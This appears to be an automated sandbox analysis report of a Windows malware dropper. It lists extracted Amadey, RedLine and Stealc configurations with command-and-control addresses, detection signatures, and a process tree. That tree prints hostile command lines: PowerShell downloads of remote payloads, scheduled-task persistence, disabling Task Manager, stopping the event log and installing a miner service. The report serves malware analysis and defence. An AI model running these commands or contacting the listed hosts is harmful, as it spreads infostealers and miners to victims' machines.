Analysis
-
max time kernel
143s -
max time network
148s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-06-2024 23:54
Static task
static1
Behavioral task
behavioral1
Sample
c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
Resource
win11-20240611-en
General
-
Target
c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe
-
Size
1.8MB
-
MD5
5cce8686e206242b06755e8d3b980097
-
SHA1
e2817338b2d55f57189dc48634613187adca42d5
-
SHA256
c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93
-
SHA512
81c957a13d1667f722856a15c6ec07da3bd1676c72199971579fb1b6b2ba01e2466a35ddb8c7f1b6a4f3621ffd04b8ec2536bffe9e484f690e8c3a7fb1cd79f1
-
SSDEEP
49152:wgh0Oc345yOwAvHcIBZjoWi9zgncIV2NyJN/LhdCNQO73+:Vh0f3iN/cAoV6c2eyz/Lhsd73+
Malware Config
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
redline
LiveTraffic
4.184.236.127:1110
Extracted
redline
123
185.215.113.67:40960
Extracted
redline
@OLEH_PSP
185.172.128.33:8970
Extracted
stealc
jopa
http://65.21.175.0
-
url_path
/108e010e8f91c38c.php
Extracted
redline
06-25-24
85.28.47.7:17210
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3360-38-0x0000000000400000-0x0000000000450000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe family_redline behavioral2/memory/2832-226-0x0000000000E20000-0x0000000000E70000-memory.dmp family_redline behavioral2/memory/900-227-0x0000000000A50000-0x0000000000AA0000-memory.dmp family_redline behavioral2/memory/4232-329-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
Processes:
c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/1680-411-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-414-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-417-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-416-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-415-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-413-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-410-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-421-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-429-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-431-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/1680-430-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid process 18 3000 powershell.exe 19 3000 powershell.exe 20 4928 powershell.exe 21 4928 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 4984 powershell.exe 3000 powershell.exe 4928 powershell.exe -
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
axplong.exeaxplong.exec6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exeaxplong.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe -
Executes dropped EXE 25 IoCs
Processes:
axplong.exegold.exeNewLatest.exeHkbsse.exeInstaller.exeldr.exeHkbsse.exealex5555555.exesvhosts.exe123.exeExplorers.exestl.exerig.exestl.exeHkbsse.exeaxplong.exeO3B6wY7ZkFhh.exestl.exeTpWWMUpe0LEV.exestl.exewfbrmcwrltkl.exeHkbsse.exeaxplong.exeHkbsse.exeaxplong.exepid process 1428 axplong.exe 2828 gold.exe 4468 NewLatest.exe 2304 Hkbsse.exe 3096 Installer.exe 3384 ldr.exe 832 Hkbsse.exe 3564 alex5555555.exe 900 svhosts.exe 2832 123.exe 4688 Explorers.exe 4448 stl.exe 1580 rig.exe 1568 stl.exe 4876 Hkbsse.exe 4560 axplong.exe 584 O3B6wY7ZkFhh.exe 1772 stl.exe 4512 TpWWMUpe0LEV.exe 4232 stl.exe 3800 wfbrmcwrltkl.exe 4964 Hkbsse.exe 4544 axplong.exe 1300 Hkbsse.exe 2140 axplong.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplong.exeaxplong.exeaxplong.exeaxplong.exec6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe -
Loads dropped DLL 3 IoCs
Processes:
TpWWMUpe0LEV.exeaspnet_regiis.exepid process 4512 TpWWMUpe0LEV.exe 4844 aspnet_regiis.exe 4844 aspnet_regiis.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/1680-407-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-408-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-411-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-414-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-417-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-416-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-415-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-413-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-410-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-409-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-405-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-406-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-421-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-429-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-431-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/1680-430-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Installer.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Installer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 4360 powercfg.exe 2516 powercfg.exe 392 powercfg.exe 3304 powercfg.exe 1392 powercfg.exe 3292 powercfg.exe 3296 powercfg.exe 3440 powercfg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exepid process 4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe 1428 axplong.exe 4560 axplong.exe 4544 axplong.exe 2140 axplong.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
gold.exealex5555555.exeTpWWMUpe0LEV.exestl.exewfbrmcwrltkl.exeO3B6wY7ZkFhh.exedescription pid process target process PID 2828 set thread context of 3360 2828 gold.exe RegAsm.exe PID 3564 set thread context of 4260 3564 alex5555555.exe RegAsm.exe PID 4512 set thread context of 4844 4512 TpWWMUpe0LEV.exe aspnet_regiis.exe PID 4448 set thread context of 4232 4448 stl.exe stl.exe PID 3800 set thread context of 1680 3800 wfbrmcwrltkl.exe explorer.exe PID 584 set thread context of 1804 584 O3B6wY7ZkFhh.exe BitLockerToGo.exe -
Drops file in Windows directory 3 IoCs
Processes:
c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeNewLatest.exeldr.exedescription ioc process File created C:\Windows\Tasks\axplong.job c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe File created C:\Windows\Tasks\Hkbsse.job NewLatest.exe File created C:\Windows\Tasks\Hkbsse.job ldr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 3032 sc.exe 1764 sc.exe 3704 sc.exe 3428 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3408 2828 WerFault.exe gold.exe 1620 3564 WerFault.exe alex5555555.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
aspnet_regiis.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 aspnet_regiis.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString aspnet_regiis.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4276 schtasks.exe 4668 schtasks.exe 3052 schtasks.exe 4292 schtasks.exe 4296 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
Processes:
c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exepowershell.exepowershell.exepowershell.exeRegAsm.exeExplorers.exeaxplong.exesvhosts.exeaspnet_regiis.exe123.exestl.exerig.exewfbrmcwrltkl.exeaxplong.exeaxplong.exepid process 4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe 4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe 1428 axplong.exe 1428 axplong.exe 3000 powershell.exe 3000 powershell.exe 4984 powershell.exe 4984 powershell.exe 4928 powershell.exe 4928 powershell.exe 3360 RegAsm.exe 3360 RegAsm.exe 3360 RegAsm.exe 4688 Explorers.exe 4560 axplong.exe 4560 axplong.exe 900 svhosts.exe 900 svhosts.exe 900 svhosts.exe 900 svhosts.exe 4844 aspnet_regiis.exe 4844 aspnet_regiis.exe 2832 123.exe 2832 123.exe 2832 123.exe 4844 aspnet_regiis.exe 4844 aspnet_regiis.exe 4232 stl.exe 4232 stl.exe 1580 rig.exe 1580 rig.exe 1580 rig.exe 1580 rig.exe 1580 rig.exe 1580 rig.exe 1580 rig.exe 1580 rig.exe 3800 wfbrmcwrltkl.exe 3800 wfbrmcwrltkl.exe 3800 wfbrmcwrltkl.exe 3800 wfbrmcwrltkl.exe 3800 wfbrmcwrltkl.exe 4232 stl.exe 4544 axplong.exe 4544 axplong.exe 2140 axplong.exe 2140 axplong.exe -
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
powershell.exepowershell.exepowershell.exeExplorers.exestl.exeRegAsm.exesvhosts.exeRegAsm.exe123.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exestl.exedescription pid process Token: SeDebugPrivilege 3000 powershell.exe Token: SeDebugPrivilege 4984 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 4688 Explorers.exe Token: SeBackupPrivilege 4688 Explorers.exe Token: SeSecurityPrivilege 4688 Explorers.exe Token: SeSecurityPrivilege 4688 Explorers.exe Token: SeSecurityPrivilege 4688 Explorers.exe Token: SeSecurityPrivilege 4688 Explorers.exe Token: SeDebugPrivilege 4448 stl.exe Token: SeDebugPrivilege 3360 RegAsm.exe Token: SeDebugPrivilege 900 svhosts.exe Token: SeDebugPrivilege 4260 RegAsm.exe Token: SeDebugPrivilege 2832 123.exe Token: SeShutdownPrivilege 3304 powercfg.exe Token: SeCreatePagefilePrivilege 3304 powercfg.exe Token: SeShutdownPrivilege 4360 powercfg.exe Token: SeCreatePagefilePrivilege 4360 powercfg.exe Token: SeShutdownPrivilege 2516 powercfg.exe Token: SeCreatePagefilePrivilege 2516 powercfg.exe Token: SeShutdownPrivilege 392 powercfg.exe Token: SeCreatePagefilePrivilege 392 powercfg.exe Token: SeShutdownPrivilege 1392 powercfg.exe Token: SeCreatePagefilePrivilege 1392 powercfg.exe Token: SeShutdownPrivilege 3292 powercfg.exe Token: SeCreatePagefilePrivilege 3292 powercfg.exe Token: SeShutdownPrivilege 3440 powercfg.exe Token: SeCreatePagefilePrivilege 3440 powercfg.exe Token: SeShutdownPrivilege 3296 powercfg.exe Token: SeCreatePagefilePrivilege 3296 powercfg.exe Token: SeLockMemoryPrivilege 1680 explorer.exe Token: SeDebugPrivilege 4232 stl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exeaxplong.exegold.exeNewLatest.exeInstaller.execmd.exepowershell.execmd.exeldr.exealex5555555.exedescription pid process target process PID 4008 wrote to memory of 1428 4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe axplong.exe PID 4008 wrote to memory of 1428 4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe axplong.exe PID 4008 wrote to memory of 1428 4008 c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe axplong.exe PID 1428 wrote to memory of 2828 1428 axplong.exe gold.exe PID 1428 wrote to memory of 2828 1428 axplong.exe gold.exe PID 1428 wrote to memory of 2828 1428 axplong.exe gold.exe PID 2828 wrote to memory of 3360 2828 gold.exe RegAsm.exe PID 2828 wrote to memory of 3360 2828 gold.exe RegAsm.exe PID 2828 wrote to memory of 3360 2828 gold.exe RegAsm.exe PID 2828 wrote to memory of 3360 2828 gold.exe RegAsm.exe PID 2828 wrote to memory of 3360 2828 gold.exe RegAsm.exe PID 2828 wrote to memory of 3360 2828 gold.exe RegAsm.exe PID 2828 wrote to memory of 3360 2828 gold.exe RegAsm.exe PID 2828 wrote to memory of 3360 2828 gold.exe RegAsm.exe PID 1428 wrote to memory of 4468 1428 axplong.exe NewLatest.exe PID 1428 wrote to memory of 4468 1428 axplong.exe NewLatest.exe PID 1428 wrote to memory of 4468 1428 axplong.exe NewLatest.exe PID 4468 wrote to memory of 2304 4468 NewLatest.exe Hkbsse.exe PID 4468 wrote to memory of 2304 4468 NewLatest.exe Hkbsse.exe PID 4468 wrote to memory of 2304 4468 NewLatest.exe Hkbsse.exe PID 1428 wrote to memory of 3096 1428 axplong.exe Installer.exe PID 1428 wrote to memory of 3096 1428 axplong.exe Installer.exe PID 3096 wrote to memory of 1840 3096 Installer.exe cmd.exe PID 3096 wrote to memory of 1840 3096 Installer.exe cmd.exe PID 1840 wrote to memory of 3052 1840 cmd.exe schtasks.exe PID 1840 wrote to memory of 3052 1840 cmd.exe schtasks.exe PID 1840 wrote to memory of 4292 1840 cmd.exe schtasks.exe PID 1840 wrote to memory of 4292 1840 cmd.exe schtasks.exe PID 1840 wrote to memory of 3000 1840 cmd.exe powershell.exe PID 1840 wrote to memory of 3000 1840 cmd.exe powershell.exe PID 1428 wrote to memory of 3384 1428 axplong.exe ldr.exe PID 1428 wrote to memory of 3384 1428 axplong.exe ldr.exe PID 1428 wrote to memory of 3384 1428 axplong.exe ldr.exe PID 1840 wrote to memory of 4984 1840 cmd.exe powershell.exe PID 1840 wrote to memory of 4984 1840 cmd.exe powershell.exe PID 4984 wrote to memory of 2876 4984 powershell.exe cmd.exe PID 4984 wrote to memory of 2876 4984 powershell.exe cmd.exe PID 1840 wrote to memory of 4928 1840 cmd.exe powershell.exe PID 1840 wrote to memory of 4928 1840 cmd.exe powershell.exe PID 2876 wrote to memory of 4296 2876 cmd.exe schtasks.exe PID 2876 wrote to memory of 4296 2876 cmd.exe schtasks.exe PID 3384 wrote to memory of 832 3384 ldr.exe Hkbsse.exe PID 3384 wrote to memory of 832 3384 ldr.exe Hkbsse.exe PID 3384 wrote to memory of 832 3384 ldr.exe Hkbsse.exe PID 2876 wrote to memory of 1300 2876 cmd.exe reg.exe PID 2876 wrote to memory of 1300 2876 cmd.exe reg.exe PID 2876 wrote to memory of 4276 2876 cmd.exe schtasks.exe PID 2876 wrote to memory of 4276 2876 cmd.exe schtasks.exe PID 2876 wrote to memory of 4668 2876 cmd.exe schtasks.exe PID 2876 wrote to memory of 4668 2876 cmd.exe schtasks.exe PID 1428 wrote to memory of 3564 1428 axplong.exe alex5555555.exe PID 1428 wrote to memory of 3564 1428 axplong.exe alex5555555.exe PID 1428 wrote to memory of 3564 1428 axplong.exe alex5555555.exe PID 3564 wrote to memory of 2224 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 2224 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 2224 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 4260 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 4260 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 4260 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 4260 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 4260 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 4260 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 4260 3564 alex5555555.exe RegAsm.exe PID 3564 wrote to memory of 4260 3564 alex5555555.exe RegAsm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe"C:\Users\Admin\AppData\Local\Temp\c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 3004⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ins.bat4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:007⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 000000017⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe"C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe"C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exeC:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exeC:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exeC:\Users\Admin\AppData\Local\Temp\1000012001\stl.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000013001\rig.exe"C:\Users\Admin\AppData\Local\Temp\1000013001\rig.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "xjuumoinznsp"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "xjuumoinznsp"6⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe"C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
